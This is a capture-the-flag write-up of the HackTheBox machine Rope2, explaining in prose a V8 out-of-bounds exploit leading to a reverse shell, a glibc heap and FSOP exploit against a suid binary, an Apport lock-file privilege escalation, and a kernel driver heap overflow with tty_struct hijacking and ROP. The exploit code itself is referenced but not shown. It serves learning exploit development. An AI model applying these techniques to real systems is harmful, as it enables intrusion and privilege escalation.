Rope2 by R4J has been my favorite box on HackTheBox by far. It wasn't really related to pentesting, but was an immersive exploit dev experience, which is my favorite subject. To sum it up, this box was composed of a V8 Chromium pwnable and a difficult glibc heap (with FSOP) pwn for user, and then a heap pwn on a vulnerable kernel driver on Ubuntu 19.04. In the end, I also did end up taking second intended user and root blood, with both first intended bloods being claimed by Sampriti of course; macz also ended up taking third intended blood.
Before I start, I would like to acknowledge Hexabeast, who worked with me on the v8 pwnable. I would also like to thank Sampriti and my teammate cfaeb1d for briefly discussing the user pwnable with me.
Initial enumeration is quite obvious. An nmap scan shows port 22, 5000, and 8000 open. On port 5000, it is a gitlab instance, and exploring around (http://rope2.htb:5000/explore/projects/starred), you can see chromium source code, with a patch by the challenge author. Use the gitlab website to download the source code at its current commit: http://ropetwo.htb:5000/root/v8/commit/7410f6809dd33e317f11f39ceaebaba9a88ea970
Finding the bug is extremely easy. Take a look at the changed files in commit history. We notice that several files are changed, but the one that actually matters is builtin-arrays.cc. The other files were modified to properly introduce and incorporate the new function added in builtin-arrays.cc.
In ArrayGetLastElement, it is returning the value of the array at array[len], which is an OOB read. in ArraySetLastElement, it expects two arguments. The first argument will be the “this” argument and the second argument is the value, which the element at array[len] will be set to. This is an obvious OOB write. This seems quite similar to Faith's famous *CTF OOB writeup. One important thing to note here is that in December 2019, the V8 team introduced pointer compression to the V8 heap. Basically, it's a pretty smart memory saving decision; rather than storing 64 bit pointers on the heap, most of the pointers will be treated as 32 bit (with only the bottom half of the qword stored), while the upper 32 bits (also known as the isolate root) is stored in the r13 register.
As mentioned earlier, the other files were just modified to support the addition of this new function for builtin arrays in V8.
typer.cc and bootstrapper.cc tells us that we can access these functions from builtin arrays with GetLastElement and SetLastElement.
For some reason, only the compiled Chromium was provided. There was neither a d8 release nor a d8 debug binary. The repo was also missing certain Chromium build scripts as well; however, once everything is fixed correctly, the build instructions Faith provided regarding Chromium Depot tools, gclient, v8gen.py, and ninja should suffice for both release and debug. To avoid dependency hell, I ended up rolling out an 18.04 docker to deal with the compilation (check out a commit near the date of the gitlab commit before the vulnerable patch, and then add the patch back in; I know some of my other teammates also managed to build it by slowly fixing the missing dependencies).
Before I start, I highly recommend you to check out Faith's writeup
or the famous Phrack paper
, as those were the sources I relied heavily upon (my exploit is also very closely based upon Faith's). I'm still quite new to V8, so their explanations will probably be better, but the following is a summary of some important concepts I learned for personal notes.
In V8 heap, there are three main types: smi, pointers, and doubles. Doubles are 64 bits, pointers are compressed to 32 bits (and tagged), and smi are 32 bits as well (with their values doubled to differentiate them from pointers). There are also several important components to an object on the V8 heap (which you can see by running debug d8 with --allow-natives-syntax option). One should also note that Chromium uses a different allocator known as PartitionAlloc for most things, instead of glibc's allocator (which d8 uses).
For every V8 object, there are several important pieces of data. Map is the most important; it is a pointer to data that contains type information. According to Phrack, data such as object size, element types, and prototype pointer is stored in the Map. The following is a list of element types (V8 currently has 21), but V8 mainly uses SMI_ELEMENTS, DOUBLE_ELEMENTS, and ELEMENTS (with each of them having the more efficient PACKED form and the more expensive HOLEY form). Another important piece of information is the elements (and properties) pointer, which point to a region that contains a pointer to another Map, a capacity size, and then the data/pointers indexed. Array objects also have an additional additional length field as well (lengths are represented as an smi).
Here is some sample output as an example for some of the terminology above (you can see how the fields are ordered from the debugging view as well):
Interesting to see how the double array's elements are usually above the object, which starts with the map field here... perhaps we can use the OOB to create some type confusion, as you will see later.
There are a few more important V8 exploitation concepts before we begin. In browser pwning, there are two basic types of primitives: addrof and fakeobj. Retrieving the address of an object is known as addrof. As Faith discusses, this can easily be done if you just create a type confusion of an object array into a double array, so its elements, which are pointers, get outputted as such. The other main type of primitive is the fakeobj primitive, where as the name implies, fake objects in memory. As Faith discusses again, this can be achieved by just creating another type confusion of a double array into an object array, and writing pointers into the elements.
Using these two primitives, one can achieve arbitrary reads and writes. For arbitrary reads, we can make a double array where the first element contains a double array map, and then create a fake object over that field (making it think its a double array). We can now manipulate the index which acts as the element pointer to be a valid address, and have it read its content from there by indexing into our fake object. Using this same concept, we can achieve an arbitrary write.
At this point, with all 4 of these primitives, we have enough to gain arbitrary code exec. Normally, Chromium runs under a sandbox that makes “arbitrary” not exactly true, but we don't have to worry about it here as it is disabled. The standard way in V8 exploitation is to use WASM instances. When you initialize a WebAssembly Instance, a new rwx page is mmap'd into V8 memory. Since this instance is also an object, you can leak its address. At the Instance + 0x68, the rwx page address is stored in its 64 bit entirety, so you can use arbitrary read to read it out. Then you can write your own shellcode into the rwx region. Calling your exported Web Assembly function will now execute such shellcode. One might wonder why such an advanced software would be using rwx page. Apparently, V8 devs pinpoint
the issue on asm.js, which requires lazy compilation into Web Assembly, and the constant permission flips impact performance a lot.
However, how can you write into 64 bit addresses outside of the V8 heap when there is pointer compression and you can't control the isolate root? Basically, ArrayBuffer's backing store still store the 64 bits in entirety as it references a region outside the V8 heap (since the backing store is allocated by ArrayBuffer::Allocator
) as you can see in the image below.
If you change the backing store, you can now write to that arbitrary 64 bit address location (like in your WASM instance) with a DataView object initalized over your ArrayBuffer, since ArrayBuffer are low level raw binary buffers
and only DataView (user specified types for values) or TypedArrays (uniform value access) can be used to interface with its contents. You can also perhaps find a stable way to leak a libc address as they do exist in the V8 heap (and V8 heap behaves predictably), and then choose to overwrite a hook function to another function or a stack pivot; do note that this success rate would work better inside d8 (since it uses glibc's allocator) than Chromium (which primarily relies on PartitionAlloc, but I believe glibc's allocator is still occasionally utilized).
Anyways, after the crash course above, let's begin discussing this exploit. Due to pointer compression, the OOB won't exactly be as easy as the one from *CTF (OOB behavior for double arrays will still behave the same). Notice how in the patch, builtin arrays are forcefully typecasted as 64 bit FixedDoubleArrays. If you have an array of objects, this forced typecasting groups 2 object pointers together as one double value each time while also retaining the same original length (but it'll also be indexed as a double array). For example, if you have an object array of size 2, typecasting this into a FixedDoubleArray makes it a FixedDoubleArray of size 2, which is equivalent to an object array of size 4, so indexing won't behave the same. If your object array is of size n, the OOB will access size n+1 from the FixedDoubleArray, which will be treated as the 2n+1 object array index.
For example, if I declare a size 2 array of objects called temp, the following behavior occurs:
convertToHex(ftoi64(temp.GetLastElement())) outputs 0x40808cad9
Running temp.SetLastElement(itof(0x13371337n)) causes the following behavior:
While this won't allow for a direct map overwrite and type confusion, but we just have to take a longer route around it. For addrof, you can start off by creating an object array of size 1, and an object array of size 2 (that contains your target objects). You should also grab some other double array's map, and the second array's element pointer with OOB read. This way, when we perform an oob write on the first object array, it will hit the real index (in terms of 32 bit compressed object pointers) of 3 from its starting index, which would overwrite both its own properties and elements pointer. We can replace its elements pointer with the elements pointer of the second array, and just wipe out properties pointer since it won't matter for arrays that much. Now, when we try to OOB write on the first array, it will still see it as size of 1 double (effectively 2 object pointers due to typecasting), but use the elements of the second array. Since an effective size of 2 object elements is the correct size for this size 2 object array, we will hit the second array's map and properties. Properties once again doesn't matter, and you can just replace the map with the leaked double map from the OOB read. Now indexing into this second array will leak the target object's address.
The same concept is applied to fakeobj. However, this time we aren't changing the map of the second larger object array. Rather, we want to grab it's map's value. Once we have that, we can normally OOB the float array and change it's map to an object array's map, and retrieve fake objects. Here is my implementation:
Arbitrary read and write were already explained above. In this case, due to pointer compression, we need to set both a valid address for elements as well as the size (just to choose any valid smi that's greater than or equal to size 1). I also subtracted another -0x8 from the address for the elements location, since pointer compression puts both the element's map and size in one single qword. Properties once again doesn't really matter, but the double array OOB leak handled it for us regardless so I just left it as that. As a setup for my WASM Instance, I just used Faith's implementation; due to pointer compression again, you will need to adjust for the offset of the backing store pointer. Here is the implementation so far.
And then we just need to trigger a WASM rwx page allocation, overwrite its code, and then execute the exported function. For my shellcode, I just chose a generic shellstorm x86_64 Linux reverse shell shellcode
Here is my final exploit (note that it isn't 100%, probably due to some advanced garbage collector behavior or some other V8 internals that I dont' understand):
Now we popped a shell as chrome user.
From a quick look at /etc/passwd, we know the user flag will be in r4j's home directory. Basic enumeration shows a suid binary from r4j called rshell. We can utilize this to escalate our privileges.
At this point during the release, only 3 players have popped a shell, and all of us were working towards users. This is when the A Team, per tradition, found an unintended route, and took first blood. Between the time this box was submitted and its release, 19.04 went EOL and was not patched, making it vulnerable to CVE-2020-8831
. Basically, Apport will use the existing /var/lock/apport directory and create the lock file with world writeable permissions. Since Apport is enabled by default in modern Ubuntu, we just need to run a binary that purposely crashes. I know R4J and the A Team for their example crashed a binary named “fault” and then used the symlink to write a bash script into /etc/update-motd.d for privilege esclataion (after which will be run as root on the next ssh connection):
Apparently several other boxes were vulnerable to the same bug...
For the sake of debugging (and since this is usually fine for many offsets), I patchelf'd the binary with the correct linker and libc, and re-merged debugging symbols into the library so I can properly debug with pwndbg.
Reversing the binary comes up with the following pseudocode:
Note that there is NX, Full RELRO, Canary, and PIE, and the libc version is 2.29. Basically, there is a file struct that holds the filename as a char array and the contents via a pointer. You only have 2 file spots, and you cannot have the same filenames (adding, removing, and editing are all done selectively by the filename). One issue is that there doesn't seem to be a good way to leak purely through the heap (the ls option only shows filenames, and nothing prints out file contents). Adding is quite safe (no overflows and etc.). Deleting is also safe, as the content pointer is nulled out. Edit also seems safe at first glance, but we must consider the behavior of realloc(). According to glibc source
, realloc is as the following (__libc_realloc calls _int_realloc):
If the older chunk size is larger or equal to the requested chunk size, the chunk at that same memory location remains the same and it will attempt to split it. If it's large enough to be split into its own chunk, it'll get set up properly for it to be freed. Nothing would happen if you request a realloc() of the same size. By __libc_realloc, if the requested size is 0, then it just frees it and returns 0 (but that 0 is stored in a temporary value and by the program logic, won't replace the file content pointer).
If the older chunk size is smaller than the requested chunk size, it will first attempt to extend the current chunk into the top chunk. If it's not adjacent to wilderness, it will also try to extend to the next free chunk if possible and then deal with the split for remainder later (as when the older chunk size is larger or equal to the requested chunk size). Its last choice is to just allocate, memcpy, and then free the old chunk. Note that _int_malloc is used in this case, and like calloc, the code path taken in that function will not allocate from tcache to my knowledge.
It only checks if size is less than or equal to 0x70. If we were to tell it to realloc a size of 0, we can make basically make it become a free. Without that check (and the fact that the pointer remains there), we can use this to emulate a double free; this is the central bug.
But how can we grab a leak? Well, when analyzing libc offsets, we notice that _IO_2_1_stdout_ and main arena only differs in the last 2 bytes. We will always know the last 12 bits due to ASLR behavior, and there is only 4 bits we do not know. If we attack this file structure correctly, we can have every puts call print out large sections of the libc itself during runtime. Therefore, with a 4 bit bruteforce (1/16 rate of success), we might be able to redirect a heap chunk to that file structure, modify it, and dump portions of runtime addresses.
Our end goal is to have this file structure path end up at _IO_SYSWRITE in _IO_do_write. To hit _IO_do_write, we just need to skip the first two conditionals, and have our ch argument be EOF. The second argument is already set correctly from the call from _IO_new_file_xputn. To skip the first two conditions, we need to make sure to set the _IO_CURRENTLY_PUTTING flag and unset the _IO_NO_WRITES flag in the _flag field of the file structure. The following is _IO_do_write
To hit _IO_SYSWRITE, we want to set the _IO_IS_APPENDING flag in the file structure _flag field and make read_end different from write_base; this way, it won't take the lseek syscall path and return. Now, the _IO_SYSWRITE syscall writes (f->_IO_write_ptr - f->_IO_write_base) bytes starting from f->_IO_write_base.
To summarize, based on libio.h
, we can set the flag as the following: _IO_MAGIC | _IO_IS_APPENDING | _IO_CURRENTLY_PUTTING | ~_IO_NO_WRITE. The value for the _flags field should be 0xfbad1800. The read field values won't really matter, so just set read_ptr, read_base, and read_end to null. And now, we can use a single byte to tamper with write_base, and hence have the syscall write dump memory for us.
I will now discuss the exploit itself below. A really high level of understanding of the glibc heap behavior is a must know before reading. A lot of what I do is based on heap intuition and heap feng shui as the 2 chunk limit makes this extremely tough (in fact, after you leak, you will see that you only have one chunk left to use if you don't want the program to crash).
The first thing I did was store some chunks into the 0x60 and 0x80 tcachebins for usage after the leak. This is for when I corrupt the unsorted bin, I can still get valid chunks back. I then allocated a 0x40 user sized tcache chunk, filled it with 0x71 (for fake size metadata for later, this same technique will be applied later on to beat the many size checks in glibc), and then freed it (note that in my code, fakeedit basically just performs the edit with size 0).
Here is the current heap state:
Then I started using the 0x70 tcache chunk; I used the realloc size of 0 to double free and fill the tcache (note that we must wipe the key entry of each chunk to bypass the 2.29 tcache double free mitigation). then I started pulling back from the 0x60 user sized tcache, and changed the fd pointer to redirect me into region of 0x......370 later on in the diagram above.
On my next allocation from the 0x70 tcache, I will still have the original location. Due to the original successive double frees, the two chunks will be at the same location. I then use realloc behavior to split the second chunk into a 0x50 and 0x20 real sized chunk (0x20 chunk will be sent into tcache). I then fake edited the 0x50 chunk, then split the chunk into 0x20 and 0x30 sizes (with the 0x30 being sent into the tcache), and then freed the 0x20 size chunk. What's the purpose of this complex chain of events? Well, it is for me to corrupt the tcache bins so that multiple different tcache freelists have pointers to the same memory location. At this point, my first file content also points to this 0x......370 location.
Remember now, that our current file content (size of 0x70), and the first item on the freelist for the 0x20 and 0x50 tcache freelist all point to the same location. I then allocated a chunk (for the second filename) from the 0x70 tcache bin to change the size of current file content at 0x......390 to 0x91 (so once we fill the tcache of 0x90, we can get unsorted chunks instead of fast chunks). Note that you have to continually change the key structure in the “0x90” sized chunk to bypass the tcache double free mitigation, which I performed from the chunk allocated above as edit restricts us to not go over size of 0x70.
Now we can overlap tcache bins with unsorted bins to help with a tcache bin with a 1/16 bit brute to write onto the _IO_2_1_stdout_ file structure. Here is where having different tcache bins of different size point to different locations become useful. If we just double freed the same chunk, then we can't exactly retrieve the redirected chunk, since you can allocate and modify fd for the first file content spot, and then you need two more allocations to get back the target location (and that wouldn't be possible with realloc, free, and only 2 spots). Now, with my setup, I can use one of the tcache chunks (0x20) from one of the sizes to modify 2 bytes of the fd (with only the upper 4 bits being guessed), allocate once from the 0x50 chunk, then free the 0x20 chunk, and replace that spot with a 0x50 sized allocation, giving us control over the _IO_2_1_stdout_ file structure now. Now, when puts runs again, we should get a massive dump of data. Note that from this point on, my addresses will be different since I believe this technique is somewhat ASLR dependent, and using the non-ASLR addresses as the brute only worked locally. The code below will be the one adjusted for remote work, while the image will show the original local one without ASLR.
However, as a consequence of this leaking mechanism, there is no good metadata for us to use for the size field, and subsequent frees on this chunk will fail. This means we only have one chunk left to obtain RCE.
Our end goal should be to redirect a chunk into __free_hook to pop a shell. How do we do this with only 1 chunk remaining? After a bit of cleanup, I pulled from the previously saved 0x80 chunk (as unsorted bin is now corrupted). I then fake edited it, and then split it into an active 0x20 chunk and a freed 0x60 chunk. I then freed this 0x20 chunk so I can get another allocation from the previously freed 0x80 chunk. Using this, I can change the fd of the 0x60 chunk to __free_hook - 8.
After this point, we can free our chunk once again to get space for a new allocation. I can get the location of __free_hook - 8 back by allocating from 0x60 tcache once, splitting it, freeing it, and then allocating from it again. Then it's just overwrite it with /bin/sh\x00 and address of system, and a subsequent free call from pop a shell.
Here is the final remote exploit:
Finally, we pop shell as R4J (remote 1/16 takes a few minutes):
However, we still weren't able to read the flag. It turns out that our group permissions were incorrect as we were still chromeuser group, but this is relatively trivial. newgrp - r4j will change our gid correctly, and we can grab the user flag.
Due to the nature of the box, I was 99% sure root was going to be a kernel pwn. Running dmesg showed us the following messages:
[ 20.879368] ralloc: loading out-of-tree module taints kernel.
[ 20.879407] ralloc: module verification failed: signature and/or required key missing - tainting kernel
This will probably be the vulnerable driver. Looking in /dev, there was a ralloc device loaded. The driver itself was located at /lib/modules/5.0.0-38-generic/kernel/drivers/ralloc/ralloc.ko. We can transfer that out and begin reversing. One thing to note is the current protections. From /proc/cpuinfo, we know SMEP is enabled, but surprisingly, R4J was very nice to disable KPTI and SMAP (although KPTI was originally enabled during testing, perhaps HackTheBox was running their servers on AMD Epyc and the whole issue KPTI was designed to address, Meltdown, wasn't an issue for AMD). KASLR will obviously be enabled, but check /proc/cmdline to be absolutely sure.
Reversing the kernel module comes up with the following pseudocode:
The bug is pretty clear here. When allocating from the ralloc ioctl, the size set in the global array for each entry is added to 0x20. This way, when you edit, you have a large kernel heap overflow. Deleting and reading are safe.
In order to even be able to debug this pwn efficiently, I had to use qemu so I can integrate it with peda remote debugging. I also must enable kvm, so I won't be stuck waiting 5 minutes for it to even boot. To set this up, I downloaded the 19.04 Ubuntu Server image, ensured the the kernel version was the same (126.96.36.199 from enumeration). I then set up an image drive for this specifically for an install with the following commands:
qemu-img create -f qcow2 ralloc.qcow2 6G
qemu-system-x86_64 -hda ralloc.qcow2 -boot d -cdrom ./19.04.iso -m 2048 -nographic -enable-kvm
Then, to boot this kernel, I had to set the following flags:
I also added “console=ttyS0 loglevel=3 oops=panic panic=1 kaslr” into /etc/default/grub, ran grub-update, loaded ralloc.ko into “/lib/modules/`uname -r`/kernel/drivers/ralloc”, ran depmod, and then rebooted. We should now have a proper qemu debugging environment for which we can hook peda onto. It would also be helpful to retrieve the System Map file as well as vmlinuz..
With the size limitations above, the tty_struct from the kmalloc-1024 slab is perfect for this usage; it can give both a KASLR leak via ptm_unix98_ops and rip control with its pointer to the tty_operations struct, from which we can control the ioctl function pointer. Before discussing the exploit, I would like to briefly discuss some protections in standard Linux distro kernels (which are often compiled out for CTF kernel challenges). As this post
from infosectbr mentions, freelist pointers are hardened in the following manner: ((unsigned long)ptr ^ s->random ^ ptr_addr). If we can get a heap leak, we can still perform freelist poisoning. Even if we don't get a heap leak, there is chance to overwrite and corrupt it with only an 8 byte overflow to get it to redirect properly (as the article mentions), but a heap spray is necessary. It's just easier to rely on useful kernel structures (plus, there were even more pointer hardening options added soon afterwards
in later kernel versions). Another hardening option is freelist randomization, which as the name implies, randomizes the freelist. This means our heap operations won't be predictable like in glibc, so a heap spray will be necessary.
One of the first things in my kernel exploit are the helper functions and structs. I made the following:
As mentioned earlier, we will be relying on the tty_struct structure, which gets allocated whenever we open /dev/ptmx. According to source
, the struct is as the following:
Therefore, the 4th qword of this holds the tty_operations struct pointer, which for ptmx devices, will contain the address of ptm_unix98_ops. According to the Ubuntu System-Image file, that address will have its lower 12 bits be 6a0; this will come in handy for the heap spray. From the source
, the following is the tty_operations struct:
Hijacking the ioctl function pointer seems like a good idea, as it would trigger when we run ioctl with that fd.
For the spray, my plan was to just allocate a bunch of ptmx devices, and then loop through the array of 32 spots to allocate a ralloc chunk. After each allocation, I would check if it is adjacent to a ptmx device by performing an OOB read to see if there is a ptm_unix98_ops address (we have just enough of an OOB amount to hit that field of the structure). If that is the correct one, I will just return that index. Here is my implementation:
From there, we can rebase all the necessary addresses in the kernel we need for privilege escalation to uid 0.
Now we can replace the tty_operations struct pointer with our own malicious pointer with the OOB write. Take careful note to preserve the other addresses in this struct. I also spammed my malicious tty_operations struct with pty_close to prevent other crashes (it just helps fill it with valid pointers, and crashing won't really happen since ioctl is the only operation I am planning for it). I chose a stack pivot gadget that was xchg eax, esp (since the address of the function pointer will be in the rax register when I trigger the malicious ioctl). This also allows me to determine an absolute location to make my fake stack for the rop chain.
Here is what the corruption looks like in memory (first address is the location of the length 32 array in the driver):
As you can see, there is a userland pointer that replaced the tty_operations struct pointer.
Now what should my rop chain be like? There is only SMEP, so this should be quite trivial with a ret2usr or even without it. However, the one issue I kept running into was the inability to use certain syscalls upon the return to usermode (such as execve), and I do not enjoy having an exploit that doesn't give me an ability to pop a shell. For some reason, execve with either the iretq, sysretq, or other syscall trampolines would cause a kernel panic; maybe there is something I didn't clean up with the corruption created with the exploit, but I am not completely sure. In the end, I decided to just make my exploit make /usr/bin/dash a suid binary as root and then hang the kernel thread (for 49.7 days, which is long enough). The idea was to just run the following pseudocode:
Once we added that the rop chain into the target location after the stack pivot, we can trigger the malicious rop chain and become root. While we don't know which ptmx fd is the adjacent chunk, we can just loop through all of them, and run ioctl on all of them. Note that this exploit has to be run asynchronously in bash due to the hanging.
The following is the final exploit:
And after compiling and transfering to remote... (note that you can access this driver as chromeuser as well):
Whew, and finally, we can obtain the root flag! It was a really fun journey, and definitely sparked my interest in learning more about kernel pwning (as my previous experience only involved solving kernel ROP challenges) and browser pwnables. Feel free to let me know if anything I explained is wrong or confusing (as this is quite a complex writeup), and I am 100% looking forwards to Rope3.
Acknowledgements: In addition to all the sources linked above, I would like to thank R4J, Faith, D3v17
, and Overthink
for giving this a read through and providing feedback to make the writeup even better.
Wow this is so impressive. I've only made it through the Chrome v8 exploit. I'm so going to bookmark this page and read every line carefully.ReplyDelete